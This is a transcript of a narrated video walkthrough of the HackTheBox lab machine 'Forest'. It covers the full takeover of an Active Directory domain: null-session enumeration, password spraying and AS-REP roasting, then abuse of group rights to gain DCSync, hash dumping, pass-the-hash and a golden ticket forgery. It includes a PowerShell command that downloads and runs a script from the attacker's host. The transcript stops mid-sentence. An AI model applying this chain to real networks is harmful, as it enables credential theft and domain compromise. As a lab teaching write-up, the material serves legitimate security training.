What's going on YouTube? This is IppSec and we're doing Forest from HackTheBox, which was marked as an easy. I think it's medium mainly for two reasons. Number one, it's super unique in the sense that there's no web server. It's just straight up Active Directory. So you may spin your wheels a lot on this one just because there's no real prerequisite to doing this machine. It's just all new technology. Number two, there's a lot of chains in this box, which means you can't just run a script and then get a result. For instance, the very first part is doing an ASREP Roast, which allows you to steal the hash of an account that's configured with Kerberos PreAuthentication. But you can't just run that script because you don't have credentials into Active Directory. You have to know to do a SMB null session attack to gain anonymous access into AD. And that's just something that's super common in environments. However, NMAP or something else doesn't really tell you to use this attack. So it's just kind of intuition. And then once you get a shell on the box, you have to do Bloodhound to see there's a 2-hop attack into Active Directory with allowing you to create a user, adding it to a group, and then from that group, that account can give the privilege to do DCSync into Active Directory. So with all that being said, let's just jump in and do this box. As always, we can begin with the NMAP, so -sc for default scripts, SV, enumerate versions, OA, and I don't have the directory created, so let's make dir NMAP. And now we can do OA NMAP, and we'll call the scans forest, and the IP address, which is 10.10.10.161. I'm also going to add a -v, because I want to see the open ports as it displays them. And I'm also going to do sleep 300, to wait 5 minutes before I run the next command, which is an nmap -p- to do all ports. I can do -oa for the file, nmap forest -all ports, 10.10.10.161. And I also want to do this with a -v. The reason why I want to wait about 5 minutes is I hate running two nmaps simultaneously because, well, they could conflict and you get bad things. We already see some type of delay being increased because of drop probes, so we don't want to hammer the box. The very first port, actually, let's just go check out the website. So 10.10.10.161, and nothing responds. So it looks like we may not actually have a website. So let's start off with the very first port, 445. So SMB client -L 10.10.10.161. And nothing. So let's go to Cherry Tree, Forest, Notes, SMB, Anonymous, Success, no shares. So the next thing we have is 53. This is going to be DNS. We can try making the box leak its host name with NSLookup. Type server 10.10.10.161 to send the request there. And then just do reverse lookups. So 127.0.0.1 is localhost. We can try 0.0.2. Sometimes people configure that. And then we can make it look up itself. And is a connection down? Nope. So it looks like maybe there's some DNS recursion or something going on, some type of issue where it can't look up itself. We can confirm it is a Windows box because of the TTL. Windows default TTL is 128. Every time a packet traverses the router, this decrements by 1 because TTL stands for time to live. And Linux's default is 64. So if I ping myself, we get 64, and a Cisco router is going to be, I think, 255. So if you see it above 128, chances are it's some type of networking infrastructure. If it's between 64 and 128, it's Windows. If it's below 64, chances are it's Linux. Additionally, just because it's not above 128, don't think it's networking infrastructure. For instance, I use Ubiquiti at home, and it runs Viata OS, which is essentially Linux, so it's 64 TTL. I also have FreeBSD running on this IP address on my network, and its TTL is the same. So just because it's below 64, don't automatically think Linux, because a lot of things run Linux. I'm sure Echo and all the other IoT devices will be below 64. The next port we have is two RPC things, but LDAPS, Kerberos, this is global catalog, I believe. This is regular LDAP. I don't know what that is. 464. What is port 464? Something with a domain controller. And it's talking to 3268, so probably something to do with global catalog. 593, this is some weird thing. RPC over HTTP. So let's just look at LDAP next, because that essentially has a decent attack surface. So go back to cherry tree, DNS, could not leak host name. So let's go and LDAP search -H 10.10.10.161. It's doing MD5 authentication. We don't want that. Wait a second. Okay. So I use -H because -H means host, and out of habit I did -H for help. It actually, you can't have the same flag do two different things, obviously. So when I did -H that second time, it causes LDAP search to fail, which then prints the help. So I guess you can have the same argument do two things, but we want to do -X, simple authentication. So 10.10.10.161-X. And now let us do scope, base, I think naming context. And this will get us the DN. If you don't know this, I have gone over it a few times. If you just go to like IppSec.rocks, type in LDAP and go near the bottom because these are sorted by date, I generally explain things best the first few times, and then I stop explaining it. So definitely take a look at Why Puffy, Lightweight, or Sizzle. Maybe CTF. CTF was a hard box, so I don't know how well I explained that, but let's just keep going. Actually, by HackTheBox standards, it was insane. So -B for base, and we can put this in. Essentially, this means hdb.local. Think of everything as folders, and these are different types of folders. So I forget what DC stands for, but I forget what they all stand for, actually. We can just pipe this to, I guess, LDAP-anonymous.out. And this is all the LDAP information of what we can query. So you got tons and tons of information. If we want, we can like cat LDAP anonymous grep-I. And I know I could do grep first and then the file name, but I like doing it this way. So what I'm searching for is at the end. So I just hit up and then can backspace out. I don't have to move the cursor. CN equals. We can do member of, and we can get a bunch of groups. I'm sure maybe if we do like user, we can get usernames or something, but if you use LDAP, you can do a better job and just query it. So what comes after LDAP, after that, is going to be a query. We did, I can't find it. Essentially, you do LDAP, and then this is the like searching scope, what you want to look in, and then you can do a query. So we're going to do object class is equal to person, and this will dump only the things that have the object class of people. So we can look at the very first one, Santi Rodriguez, and you can see his object class is person. We can also do organizational person or user. So let's see. When he was created 2019, September 2nd, 2019, 09, 20. Let me break this out. Sometimes it's hard to eyeball. I don't know what this piece is. Maybe this is hour. Yeah, there we go. So hour, minute, second. So that's when he was created in 2019. We can also see the login count, how many successful logins he had. And let's see what else is there. Potential email addresses, bad password attempts. What is password last set? There it is. password last set, and this isn't epoch. Windows has a really odd timestamp. It doesn't obey epoch. So if we Google like Windows timestamp to human, we get this LDAP and Active Directory timestamp, convert 18-digit LDAP human, and we get the password was set Friday, September 20th, 2019. So all this information is super handy when it comes to like doing password sprays. SAM account type is what the account name is. What was I going to say? SAM account name is the username. So we can just put this at the end, and now our query is only going to do this. So after like search scope or whatever this is, base, query, and then your filters, what you want to see. So if I do like SAM account name and email, is email one? We can do SAM account type. I know that's one. So we can see it only pulls out what we want. So I'm going to do SAM account name and grep SAM account name because I want to do a password spray. So we can also change the object class from person to user, and it is the same thing. So direct this. Actually, before we direct it to a file, let's do awk print 2. So we only grab this second piece. And then we can do userlist.ldap to remind us where we got the users from. And I'm going to delete everything. Actually, let's explain what I'm deleting. Requesting, that's obviously not one. Guest, don't need to brute force guest. And then these accounts that end in the dollars are machine accounts, which means Active Directory generated themselves, not going to crack those passwords. And then these are a bunch of things generated by Exchange, not going to crack those passwords. So we're left with 5 user accounts. So that looks good. So before we do a crack, we need to specify a word list. And I don't want to use rocku because if we do user share word list rocku.txt, we have a lot of possibilities this could be. So I'm going to do vi pwlist.txt, and we're going to make our own. So I always like putting the months because users always like using months and passwords. So January, February, March, April, May, June, July, August, September, October, November, December. I think that's in the correct order. Looking down here, we have 12, so I got all the months. Whether in the correct order or not, that is to be determined. Password. We don't have to do things like that because we're going to generate this on our own in a second. So we'll just leave that there. Forest, which is the name of the box. HTTP. Secret. And we should do like autumn, fall, spring, winter, summer. So we got 22 passwords. That should be fine. So one thing we're missing from this password list is the year. So what I'm going to do is add the year to the end. There's 100 ways to do this. I always do for loops because, well, it's just easy to remember. It's probably not the quickest, but echo I, then echo I 2019, and for good measure, let's echo I 2020. There we go. And I'm also going to echo I. Actually, yeah, that should be fine. So we can do this to T and then move T to PWList. If you cat a file, so if we cp PWList to T, if we're catting a file and then direct something over top of it, it wipes out the file. So always be careful with that. So now we have 66 passwords, but I mean, honestly, this isn't going to really be any user's password. I'd laugh if it was. So we'll do hashcat -- force. This is going to make sure we don't need to use a GPU. then --std out to say pipe it to standard out so we can see everything it's doing. Put in the word list, which is just PWList, and then rule file. So user share hashcat rules, and then best64.rule. So what this is going to do, mutate our password and do a bunch of cool things. The one thing I'm seeing it not do is add exclamation points. grep, and every good password that requires a symbol has an exclamation point. So let's add that. So go back to our for loop, for I and whatever. And we're just going to do echo I, then echo I, bang. Cat T. Now we can CPT to PWList. And then hashcat to do this. And we got a lot. If we do WC-L, 10,000 passwords. And we could also chain word list. So user share hashcat rules. And we could do toggles 1. And this is going to toggle various uppercases. So there should be some like that weren't before. So like that W is now capital, probably wasn't before, ending, whatever. And whenever you do like the toggles, you're going to have a lot of duplicates. So if we do multiple rules, because some of these may be already in best64. So we're down to 52,000 passwords, and that is a lot of passwords to do a network brute force. So let us pipe that over to awk and say length is 0, like that. So what this is going to do is it's going to take the length of the very first thing, which is this. If there were 2 words and we did $1, it would take that thing. And we're saying when that is greater than 8. So what this does, it only gives us passwords that are greater than 8. Is this greater than equal? Let's echo -n, WC-C 9. So let's do 7. Okay, now if we pipe this to WC-L, it got rid of 10,000. If we do 8, how many is that? This will be fine. 40,000, it's a lot to brute force with. I don't like doing that. Grep dash, I guess we can try this. That is a lot of things to brute force, but oh well. Cat that to T, pipe it to T, cat T, CPT, PWList.text. Sure. Before we do a brute force, we should always be kind and do our best to make sure we don't lock an account out. We could pick one of the accounts and then just try it and see if it says like locked out, but that's a very mean thing to do. I'm going to do CrackMapExec first, SMB, and then --pass pol for password policy, 10.10.10, 161. Pass pol comes after, like that. And now it's trying to extract it. Doesn't look like it's going to work. And you may have done like enum for Linux against this box. It works, most likely. We can try it. But I hate using enum for Linux. So we can go over and look at it. The main reason I hate it is it hasn't been updated in forever. And it's just a wrapper to run a bunch of things written in Perl. So if something breaks in it, you won't really know what's being like working. So when that doesn't work, I do this and do CrackMapExec with password policy and specify blank username, blank password to do a null authentication attempt. And this will generally work on a lot of domains that have been upgraded from like 2003. Because Windows, when you install a domain now, doesn't let null authentication. This works in domains that have been upgraded because back in Windows 2003, anonymous users had this privilege. And that's why an ancient tool like Enum for Linux is working. We see it actually dumping stuff out of RPC. So we can do this. I can show you how that's working. But essentially, it's a super old thing that Windows was configured. Whenever you upgrade from like 2003, 2008, because you may have required that functionality because it was there, they don't remove it. So the anonymous users is in the pre-Windows 2000 compatibility group. If you remove that, it'll fix this. To kind of show you, I do have a domain on my home network that this most likely will not work on because this is just a vanilla install of 2016. So 10.30.05, you don't have access to this because it's my home network. But we can see this attempt did not work. If I specify the username and password, that is Razorback. So this will be remember the can't. I thought that was it. Oh, I typed in the username. There we go. So you can see in a fresh install of Windows 2016, you need to have credentials. That null authentication doesn't work. So if you ever see this working, know that it's oh God. tmux attach. There we go. If you ever see this working, know to put in the report that null authentication allows domain enumeration, and you can get a bunch of information. God, this Enum for Linux is ugly. Because again, it's a super old tool, bunch of error messages, does wrappers for a lot of things. So when this works, you can kind of look at what it's doing. So I know this is doing rpcclient -u nothing 10.10.10 161. Put no password and we log in. We can do enum dom users and enumerate everything. Just to show you, if we didn't do this and specified anonymous login by just hitting enter, we get login failure. So you have to do nothing. So enum dom users, and we get the usernames. Actually, we get one we don't have before. Do we have Lucinda before? 1, 2, 3, 4, 5. Yeah, we did. So we got a new one. SVC-ALFRESCO. There is, if we hit tab twice and look at all the commands, you can do query user and query user groups. So if you do query user groups on SVC-ALFRESCO, enum dom users, yes. Query user group. We specify the RID. We can see it's in two groups. Whatever 201 and 47C is, we can do query group. And look at what the group is. That is domain users. And the second one is service accounts. So SVC stands for service account. We can also do query user SVC-ALFRESCO, which is this RID. And we can see everything. Password last set, account login time, which was 9/23. Password last set was today. And must change password is way in the future. Like, if this server is still online, then that would be amazing. But yeah, that is our PC client. Where was I? Oh, we were doing CrackMapExec. So looking at the password policy, you saw account lockout threshold is 0, so we can now safely brute force things. So if we just do -u and do LDAP anonymous.out and -p user list.ldap. And before I kick this off, I guess you can go through this. If you want to, you can do this on your own. I don't want to go through this because of all the error messages making this ugly. There's the password policy from this tool, but I think this used like polynum, I think is what enum for Linux uses. Same exact thing. -p 10.10.10.161. Maybe -d http.local. Yeah, it's doing something. I forget how it works, but do we do a space for this? Yeah, not exactly sure, but that's why I use CrackMapExec. It's a much friendlier syntax, but I need to stop talking because I forgot what I was doing. Oh, we're going to crack, but I wanted to look at SVC-ALFRESCO. Why did you not exist? Are you locked out or something? Here's the account. I think this is just the OU he's in because I don't see like a password last set. This isn't all the stuff. And he's not in anywhere else. Sebastian's in here. And his account gives me a lot more information. So there must be something, some anonymous LDAP probably doesn't have access to the OU that the service account is in. That's probably it. So we can do this and say svc-alfresco. And we'll write this to userlist.out because it's no longer from LDAP. So CrackMapExec SMB 10.10.10.161 -u userlist dot. What did I just call this? Userlist.out and -p for password list. Let this go, and it's going to fail for a long time. But this is going to be good recon to have going in the background. So exit this. We can rename this window to CrackMapExec and check on it every now and then. There's also a flag you could do to stop upon success, but I'm not going to worry about that. NMAP has finished. And we see pretty much nothing new. Yeah. I don't think it's telling us anything about, what is it? Null authentication. I don't think NMAP tells you that. Just something you should test on your own. So while that's running, let's go and look at Impacket tools, because I don't know what else to really do. So locate Impacket grep for example, and we want to go user share doc Python 3 Impacket examples. Okay, and our full port scan finished. So we can exit this window. So let's see. AT-exec. AT is a command for schedule jobs. So I'm guessing this is just going to execute scheduled tasks. DCOM is another thing for lateral movement. DP-API, this is like a password encryption utility in Windows, so that doesn't sound too useful. I don't know what ESENT-util is, so let's just go down. ESENT-util, storage engine utility, probably nothing. Get 80 users. We already have the 80 users, so we probably don't have to. Get architecture, this is going to tell us if it's 32 or 64-bit. Get NP users, this is, I think, reversible encryption. -h. Yeah, for users that do not require Kerberos PreAuthentication. So we can use this tool. Get NP users, and we want to specify -DC IP 10.10.10.161 -request, and we have to give it a target. We'll give it htb.local. If we do slash, because it expects like domain / username and then at IP address. Or if you do DCIP, you don't have to give it an IP address. And we get the service accounts thing. Password last set, last login. So let's go and we can change this format to hashcat. So -format hashcat. And let's go and crack this. So I'm going to go over to my cracking rig, which I call the Kraken. And the reason why I do this is because cracking is a very CPU intensive thing, and I don't have much CPU resources tied to my VM, and I don't want to do this on my host because I drop frames and etc. So I have a separate machine I use for cracking, and it doesn't hurt that it has a bunch of GPUs. So we can do v, we'll do hashes / SVC-ALFRESCO and paste this in. And then we have to, what is it? Hashcat example hashes grep-i KRB. And what we have is, I believe, a ASREP 23 is what we have, but we can double check. KRB ASREP service alfresco 23. So that's what we have. So we can do, copy this and do less, search, go up, and that is 18,200. So now we can crack the hash. So let's execute hashcat. If I can type -m 18,200. The hash was hashes / SVC-ALFRESCO. And then the word list, user share opt word list, RockU. That's why I have it stored on this machine. And we can do -r for rules. And for cracking, I always like doing inside pro first. So that looks good. Starting up. While that goes, we can look back over here, and it only tried cracking one user. V user list dot out. I'm not sure why it stopped after the first one. I guess we could loop this and get it working. Maybe play around with it at the end of the video if I remember, but otherwise, I'm sure you can figure it out on your own, or just loop around it. Because we got lucky and cracked this hash. So we can do copy, exit, cd, HTB boxes, forest, v creds, SVC-ALFRESCO, and service. So CrackMapExec -u SVC-ALFRESCO -p service, and specify SMB 10.10.10.161. And it logs in, but it's not orange and doesn't say pwned, so we probably won't get anything. We could, I think, do --shares. And this will list all the shares, I believe. And maybe like share enum or something. There we go. So we have access to IPC, sysvol, and net login. So let's see. Is there a group Impacket script to get like group policy password? So let's go cd back into Impacket examples, grep-i gpp star policy. Let's see. Linux sysvol extract group policy password. So let's see if this has it. Sysvol. This has been on a previous HackTheBox machine, so I'm guessing maybe not. I'm not sure how I did it before. Group policy password. So going back to the password disclosed via. So we used PowerUp before. So this is using Empire. So if you want to look at group policy password, we explained it in this box. I'm going to put it on the notes of things I did not do. And we'll move on because I'm not sure how to do that on Linux. If I come to a dead end, I will go back to that and look. So let's see. Go to nmap, lastforest.nmap. There is that RPC over HTTP we could look into, but let's go to forest, all ports. And we have 5985, which is WinRM. So PowerShell remoting. Let's try that. Opt Evil-WinRM. Evil-WinRM -H -U SVC-ALFRESCO -P S3RV like that -I 10.10.10 161. Sweet, we're on the box. So dir cd Sebastian dir can't. Dir SVC-ALFRESCO desktop. That's what user.txt is. We can't go into administrator. We can, but we'll get denied. Nothing here. So let's run linenum. So they're not linenum. Habit. WinPEAS. Make dir SMB. And then we will cp. Let's go cd opt privilege escalation awesome suite and find.grep.exe and ends with exe. So we can copy, see something out of releases. Guess we could do obfuscated releases, but this should be fine. So cp this to HTTP boxes forest SMB. Go into that directory. And we have to start a server. So Impacket SMB server. We'll call this please subscribe. The directory we want to share, which is our current directory. So I just do pwd SMB2 support user IppSec password support me on Patreon. Okay. So now we'll have to do a net use or get a New-PSDRive. So in order to do that, we're going to have to put the password in a credential object. So pass is equal to convert to secure string support me on Patreon. And then as plain text force. I think that's correct. Yep. So now we can do cred is equal to new object, system, management, automation, PS credential. And our user is IppSec and the password is pass. There we go. So now we got a credential object. So now we can do New-PSDRive name IppSec PS provider file system credential cred, and the root of this drive is 10.10.14.2. I think that's my IP. Ifconfig ton0. That is my IP. And the share is please subscribe. Did I do this right the first time? Huzzah! We did. We connected. So in a few seconds, we should get our prompt back. And when we do, we can go into the IppSec drive and then run WinPEAS. And I'm going to copy this while we're waiting, because this is going to be handy if we have a loser shell or start a new one. Okay. And get the last one. So cd IppSec dir ./winpeas.exe to execute it. Oh, we probably should have done -h and an actual option. It looks like it's working. Let's see. Okay, that looks good. Go back to CrackMapExec. Didn't get anything on this user, but let's ignore this and go rename this to shell2. And we can put this, actually, yeah, we'll rename this to shell1. And let's go onto this box. So opt, what is it? Evil-WinRM. Evil-WinRM-u, IppSec, not IppSec, -u, SVC-ALFRESCO, -p, service, -i, 10.10.10, 161. Check this, hasn't finished. Let's go back here. Grab our password, run it. Grab the credential. Boom. Paste. And we're going to call this IppSec2. Every now and then, like when I have multiple sessions using the same like drive name and PowerShell, things have acted wonky. So I always try using different names. And this is finished, so we're good. Oh, sweet. It checked group policy for us. So it's not there. Boom. Done. Go to the top, and we'll go down. Laps is not installed, LSA protection, credential guard. These two things you need admin to exploit. Cache logins, when domain users log in, it may store it in a DCC2 hash, I believe. But again, you need admin to extract those, so I'm not really concerned about cache logins. That's just highlighting anything with name, not interesting. No AV detected. We do have, oh, that's CD-ROM, not drive. We have permission to write in C:, so if we have any like unquoted service paths, we can probably take advantage of it because we can create the create probably C: program.exe. So unquoted service paths is probably a good way to prevesc on this machine. Current user, auto login credentials found. Not displaying them, so maybe it just sees the default domain. That I have no idea why it's saying that. Not too helpful. Hey, I found it. Not going to tell you it. I don't know what that's saying. Going down, we have DNS. Not interesting. Firewalls disabled. Bunch of things that looks through. Guessing these are read protected. There's no way we can just copy this. Normally anything in this config directory is read protected. So in order to get it to it, you either have to be in like safe mode, use shadow files, or like ninja copy to interact with NTFS directly. So we can try copying it, but access is denied. Yep. So can't do it. That's just shell 2. So what else can we do? This is a domain controller, so let's do Bloodhound. Bloodhound GitHub. We could download it from within our Kali, but Bloodhound gets updated pretty regularly, so I always like just pulling it. So cd smb, we can do cd opt arm-rf, Bloodhound. I'm going to delete my old copy, and then just pull the new one. And this has the exes pre-compiled. So if we grep for exe, we have it. It doesn't have the actual like Bloodhound application. So we'll have to download that separately. HTB boxes forest SMB. So if we just go over to the releases, we can download it. wget like this. And we can unzip Bloodhound Linux x64. And before starting Bloodhound, you have to start Neo4j. So I do Neo4j console. Actually, let's say I forgot what I set my Neo4j password to, or I just installed it. So if we locate Neo4j grep for auth, we delete this file. This is going to delete essentially your password file. And now when you start up Neo4j, you will go to the web port it says. And then you can reset the password. So the default credentials is, I think, Neo4j for the username and password. However, it forces a password at next login. So if you just try starting Neo4j and then running Bloodhound, it's going to fail authentication because you need to change the password. So that's what I'm doing now. Go here, Neo4j. And we put a new password. I'm just going to do Neo4j. We'll call it Bloodhound. I think I mistyped that. No, I did not. Unless I mistyped it twice, which will be really interesting in like 30 seconds when I try authenticating. So we execute Bloodhound with no sandbox. And the password is Bloodhound. Log in. Success. And let's see. Oh. We didn't actually run Bloodhound yet, did we? We copied SharpHound to this directory, I think. But did not run it. So /sharphound.exe-c all. And this is going to do all collection methods together. Doesn't take too long. If you go to the Bloodhound wiki, it says, let's see, where's usage? Building, dev. Let's get out of the wiki. It's probably on the main page. Oh well. Oh, not done yet. Let's see. Wiki, home, getting started. Bloodhound, that's not it. Cipher query gallery, that's running custom cipher queries. If you did -H for help, it'll show everything. So while that's running, let's go import it. I clicked the wrong thing. Okay, thank God. Never know what's going to open up when you click the wrong icon. HTB boxes forest SMB. We take the Bloodhound and we drop it. You got a little loading bar right over here. While that loads, we can go here and just look at the options. So collection method, you have them right here. Group, local, whatever. Stealth, if you want to be stealthy, you can specify the domain. Change the zip file name may be good because there may be some type of alerting based upon the zip name, something bloodhound.zip. So if they have like sysmon installed and you see Bloodhound in a file name, may trigger an alert. So you may want to change things like that. Also, you can put a encrypted zip password. Where is it? Encrypted zip. So we put a password on it so if someone grabs that zip, they can't just pull all the domain information, which is definitely a good thing to do. but it should be done importing. We have finished processing the files. The first thing I like doing is setting what I have owned. So you can do SVC-ALFRESCO, SVC-ALFRESCO. Okay, must have mistyped it. Right click it and mark user as owned. So we can do query users. You can say show paths from Kerberoastable users. And, oh, Kerberos is only detecting that. Okay. Sometimes the demo gods don't work. Show path from own principals. And then you select who you have owned, and it builds you this little nice graph. So we can see Alfresco is a member of service accounts. Service accounts is a member of privileged IT. Privileged IT is a member of account operators. And there's an exchange. What? NSLOOKUP. exch01.htb.local. Server 10.10.10.161. exch01.htb.local. So this was part of a different domain, 10.10.10.7. So interesting. If we ping it, ping Windows hoping -N, it's probably -C, 10.10.10.7. Yeah, destination unavailable. Hey, I actually got that right. So Exchange once upon a time was active, but no longer. Account operators has generic all over Exchange Windows permissions, which has write DACL to htb.local. So service accounts is a special group in Windows that lets you create accounts and put them in different groups. So if we do service account group Windows. No, what is it? Oh, account operators. Service account is what he created. Account operators. This is what I was meaning to say. That's not it. Maybe this. Maybe we can just read what Google said. Account operator grants limited creation to a user. Members of this group can create or modify most types of accounts, including those and users, local groups, and global groups. And if you go to the page, it'll say it can't do administrators, backups, etc. Let's see, account operators. Let's see, members of the account operators cannot manage the administrator, user account, the users of administrators, or server operators, account operators, backup operators, or print operators. So these are groups we can't add people to. But if it's not one of those, we can. So we can add someone to this Exchange Windows permission group. And we can also create accounts. So because this is HTTP, I don't want to modify this account and mess it up for everyone. So let's go create our own user. So I'm going to do net user, IppSec, and the password of please subscribe. And we'll do add and domain. Password's longer than 14 characters. Okay, please sub. Okay, so now we have used our account operators to create a user called IppSec. We have to add them to this Exchange Windows permission groups. So let's do net group Exchange Windows permission. Is it permissions? It is. So we see there's no members. So we can do /add IppSec. Look at it. And IppSec is now a member. And if you do help, you can do abuse info and read it. They use PowerView to do this. I just did it through the net use command because that's generally how I add users. It's simple and easy to remember. So we got this write DACL over htb.local. And if we go to abuse info, we can see we're adding DomainObjectAcl, the rights DCSync. So this is out of a tool called PowerView. Most of these are, or anything in Bloodhound, I think tells you PowerView. I'm guessing that's going to be updated soon to go to whatever their .NET stuff is. But for now, let's go grab PowerView. Power up. See. PowerSploit, Recon, PowerView. Okay. It's PowerSploit deprecated. We probably want to grab either the master or the dev branch. Master last modified December 2016. Dev is 2018. I'm going to try the master first. There's some syntax changes and stuff between the two, and I think Bloodhound expects you to have the regular. So I don't know what version I have, but I'm just going to wipe it, git clone, go into PowerSploit, and we can do, I think it's recon. It's PowerView here. Find.grep-i, PowerView. It is. I just can't read. Oh, it was ingrained. For some reason, I just discredited it when I read it. Make-dir, HTTP, boxes, forest, dub. Copy this there. Okay. cd www. Python 3-m, http.server, port 80, ix, new object, net.web client, download string, http 10.10.14.2/powerview.ps1. Looks good. Hit it. That's good. So let's go here. The credentials we already have here, so we can just do this. This is please sub. The user, are they saying okay? So, whoops. We'll do HTTP, IppSec like that. Pass. Cred. And then we run this. I'm just going to do lowercase c. Don't think that matters. Target identity. This is htb.local. Okay. Not recognized as a command. So we want the dev. So we can grep-i, what is it? Add domain on PowerView. Not there. So let's rm-rf, PowerSploit, get clone, -b dev to download the dev branch, PowerView, recon, cp PowerView to the same directory. We'll go in shell number 2, and we can copy that IEX command. And the reason why I'm doing this is I'm not 100% positive if I reload this, if it'll like screw anything up, because there's probably a lot of changes between the two versions of PowerView. And I mean, it's just much cleaner to start from a fresh environment. So copy this. There's one thing I don't like about this command is it's not saying what the target user is. We got this target identity, but that is just specifying testlab.local, which is the domain. So we'll see. So the tool I'm going to use to dump everything is called SecretsDump. So SecretsDump.py, and that's another Impacket utility. So we can go back to the user share place, cd, and run SecretsDump.py. And we specify, I think, just HTTP IppSec at 10.10.10.161. You can do colon the password, so please sub. And I think you have to do the fully qualified domain, http.local. And it failed. We never got the shell back. Do this again. Copy. Come on. Do this. Okay. And what we're going to do is Google this. See if there's other syntax. Add-DomainObjectAcl, rights, DCSync. Let's see. Go here. IX, get domain users. DCSync. Target identity. It's doing it in the LDAP format. And principal identity. That's what I want. So let's try adding principal identity. Principal identity. IppSec. And that returned. It's looking better. Did not work. Let's see. The other thing they did was DC equals HTTP, DC equals local. Is that how they specified? Yep. Try this. Run it again. And we got a dump. Sweet. So we got the local administrator password. If I can click it. Oh, we'll just wait for it to finish. So we have all the hashes to all the accounts. We can grab it. And I'm going to output this to hashes.out. And while that goes, CrackMapExec, SMB 10.10.10.161-U, administrator, I think -H for hash. Is it capital H? Hash -capital H is hash. Oh, CrackMapExec does not like this being the same directory. Make to LOL. Go in there, run the same command. That's actually funny. We can see he has been pwned. So if we just do PSEXEC, we will be able to pop this. So PSEXEC, do we have Impacket-PSEXEC, or do we have to go in the directory? Locate PSEXEC.py, user share doc python 3. I should really just add this to my path. PSEXEC.py, administrator, 10.10.10.161. If I put the hash, colon the hash, put the hash, PSEXEC.py -H, I know there's a way, -hashes. and once the LM and then colon the NTLM, this is more just a regular expression thing. So it doesn't matter what you put for the LM. It doesn't have to be that like AAD3B thing, which is a blank LM hash, I believe. Blank LM hash AAD3B. Yeah, AAD3B435B51. Yeah. So that's the blank LM hash, what you generally see. But we're now as administrator and CD users, administrator, and desktop, root.txt. So that is the box. One thing we can do that may be fun is, where did I save? Oh, I'm probably in like a weird directory. Hashes.out is here. If we cat hashes.out, we can probably grep it for like 3 colons. There we go. awk-f print 4, I think. Here's NTLM hashes. 31D6, that's a blank one. 2 root HTTP. Actually, we can just copy this since it's on the screen. And we could go back to the Kraken and see if any crack. So cd hashcat v hashes NTLM forest paste. Actually, whenever I crack hashes, one thing I like doing is specifying the user. So if we do print 1:4, put the colon in quotes, we got username colon the hash. And I don't need, actually, yeah, let's grab everything because I want the administrator included. So copy this. Now SSH to the Kraken, v hashes for cd hashcat, v hashes forest.-ntlm, paste, and I guess we can leave everything. So if we do hashcat-m1000, which is the NTLM, hashes forest-ntlm, opt wordlist rocku rules inside pro, it's going to fail because it's going to say like unrecognized hash length. However, if you specify the --users or --user, it's going to essentially do that awk and take everything after the first colon. And this becomes super handy. Wow. That is a weird one that cracked. PLOKMIJ. That's a weird keyboard walk. But crack that one. So we don't know exactly what this guy is. And if you didn't do like that --users, you won't be able to do this. You can do get rid of everything and just do --show. And it specifies everything. Specifies the user. If you didn't have this in your pot file, so we can get rid of it real quick, it'll just show you what cracked. So Santi's password is this keyboard walk. So in the future, if you're doing a machine from Mr. Ben, maybe you can try brute forcing keyboard walks and surprising him, because maybe he likes them. But what was I going to say? Cat hashes forest-ntlm awk-f print 2. So if we just have a thing of hashes with no usernames in it, and we do this show command, we can get rid of this user flag. Cat hashes. Oh crap, I did what I said earlier. I catted a file and directed it to itself, so it wiped it. I lose more files that way than anything else. But you can see, if you just had the hashes, you don't get the username in here. It's not as immediately useful. So that's that. Let's see. I guess we could show golden ticket. Because we have, do we have KRBTGT? I do. So I guess we can show golden ticket. So I'm going to take a break and get some water, and then we'll do golden ticket, and I'll call it a day. Okay, I'm back. So let's do the golden ticket. Normally I do this from Mimikatz. We're going to try doing it all from Linux. So I'm just going to Google golden ticket from Linux. And the first one is a cheat sheet. So let's try this. Kerbrute. That's brute forcing. Oh, this is all Kerberos stuff. Kerberoasting. So this is the most common Kerberoast, is user SPNs. We did ASREP Roast. So we didn't Kerberoast before. If I said that, misspoke. We did an ASREP Roast. And that actually is not shown in Bloodhound, as we learned. So maybe we should look into always running this script if you're one that likes to do Kerberoasting, which is get user SPNs. So, two different things. Shouldn't run them both, but looking, okay. Using a ticket within Linux. Okay, so we use, nope, that's not it. Golden ticket is what we want. So we're going to run this ticketer.py, export KRB5cc name, and then run PSEXEC. So let's go back here. Let's copy this KRBTGT. And this is the signing key Windows uses to sign tickets. So this is what lets us spoof it. I'm just going to copy KRBTGT. We need the domain SID. So let's just go over to shell 2. And we can do get AD, I think domain, htb.local. Is this going to work? There we go. Domain SID is here. SID, there we go. And that should be the hard parts. So it's doing domain and username. Username actually doesn't matter because we're creating our own ticket. So I'm going to use one that doesn't exist. And the one thing it's not doing that may be confusing if you're just looking at this is it's taking a lot of automatic defaults. So if we go locate Impacket grep example, we go in here and look at ticketer, and let's just search for groups. So this allows us to customize things in this, groups, extra SIDs, etc. Extra SID is like when a user is migrating between domains for a brief period. I think he has 2 different SIDs. And essentially that's so if you're migrating the user and he has an active ticket, the ticket's accepted on both domains. So if he's active, he doesn't lose his current connection. If you didn't have that, then his connection would drop and all shares would not work until he relogs in with the new domain. So that's why extra SID is a thing, I believe. I haven't looked at that since probably last year. So that is my understanding of it. So if we look at this, parser add argument groups, defaults, 512, I believe, is domain admin. I don't know what these other ones are. If we go to Google, Microsoft, well-known SIDs, and we can search for this. So this is explaining all that SID information. I'm sure it's on IppSec.rocks, but 512 is going to be domain admins. 513 is going to be domain users. 520 This is group policy creator owner. 518, I think that's backup. 518, schema admin. 519 is enterprise admin. So it's adding us to all these groups. So any ticket we have will have those groups added to it. And the domain isn't going to validate the ticket because the ticket is signed by the domain. So you pass this ticket to a computer, it's like, well, it's signed by the domain. I don't have to validate it because, well, the domain has already validated it by signing it. That's how signing works. If every single request was always validated, you'd create a lot of latency and a lot of extra requests back to the domain. So that's why this kind of thing works. So let's go back to the cheat sheet and do this. Ticketer.py, nt hash. This is going to be the NTLM. Then we have domain sid, I believe. Dash domain dash sid. And we have this. The next thing we have is dash domain, htb.local. Always use the fully qualified domain, unless this doesn't work, and then always use the not fully qualified domain, which would just be htb. Username, we'll call this totally does not exist as the user. I think that's right. Okay, we created the ticket. It's got all those groups that we said previously, so this is going to be like an administrator, etc. So we export the KRB5CC name to this ticket. So putting this in our environment variable. Okay. And then we use PSEXEC. So /PSEXEC.py totally does not exist. And we specify htb.local at 10.10.10.161. Oh, -k -no -pass. It says that right here. It's hanging. V etc host 10.10.10.161 htb.local. Let's retry this. Okay, so it was using this to look up a domain, so that's why I added an etc host. Clock skew too great. So this is probably the first time we have seen on this channel that the time actually does matter. So we do force.nmap. We can see the clock skew is 4 hours off. So the server thinks it's 4 hours off, so it's probably just some standard time zone 